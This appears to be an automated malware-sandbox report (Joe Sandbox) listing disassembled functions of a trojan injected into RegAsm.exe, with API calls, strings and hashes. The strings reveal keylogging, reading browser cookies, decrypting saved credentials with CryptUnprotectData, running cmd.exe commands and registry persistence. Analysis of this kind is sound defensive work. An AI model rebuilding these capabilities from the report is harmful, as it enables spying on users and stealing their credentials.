Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
_free.LIBCMT ref: 10004CE8
_free.LIBCMT ref: 10004CF2

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 10004C14, 10004C1B, 10004C4A, 10004C82

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-1068371695
Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63AC1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2
0NG, xrefs: 00404097

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 55177d37efe76fb4da51a5f06e43545f6dd2a6746b3a165eec7e68159dea73dd
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 55177d37efe76fb4da51a5f06e43545f6dd2a6746b3a165eec7e68159dea73dd
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0
TileWallpaper, xrefs: 0041CAC1
WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

!D@, xrefs: 00417089
8.v, xrefs: 00416322
okmode, xrefs: 0041630F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$8.v$okmode
API String ID: 3411444782-1003892208
Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B
], xrefs: 0040B180

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::eofbit set, xrefs: 0040E822
ios_base::badbit set, xrefs: 0040E7EF
ios_base::failbit set, xrefs: 0040E815

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
RegSetValueExW.ADVAPI32 ref: 0041384D
RegCloseKey.ADVAPI32(004752D8), ref: 00413858

Strings

pth_unenc, xrefs: 00413818

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F

Strings

CorExitProcess, xrefs: 10004B64
mscoree.dll, xrefs: 10004B52

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: FreeHandleLibraryModule
String ID: CorExitProcess$mscoree.dll
API String ID: 662261464-1276376045
Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5

Function 0041361B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0041363D
RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
RegCloseKey.ADVAPI32(?), ref: 00413665

Strings

8.v, xrefs: 00413624

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 8.v
API String ID: 3677997916-1733865503
Opcode ID: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
Instruction ID: f34a781dc69553a1478c4d1e38e8143fd29b0d6f10a6f19acb5bd71dd86b2662
Opcode Fuzzy Hash: f8021bfd515d837cd78af2754fa90286b7de4a0a46112e11e0f2f857281b4111
Instruction Fuzzy Hash: 00F04F75600218FBDF209B90DC05FDD77BCEB04B11F1040A2BA45B5291DB749F849BA8

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$Console$Show$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 186401046-604454484
Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

cmd.exe, xrefs: 00416125
open, xrefs: 0041612A
/C , xrefs: 0041610E

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
UnhookWindowsHookEx.USER32 ref: 0040B8C7
TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Strings

pth_unenc, xrefs: 0040B8AC

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
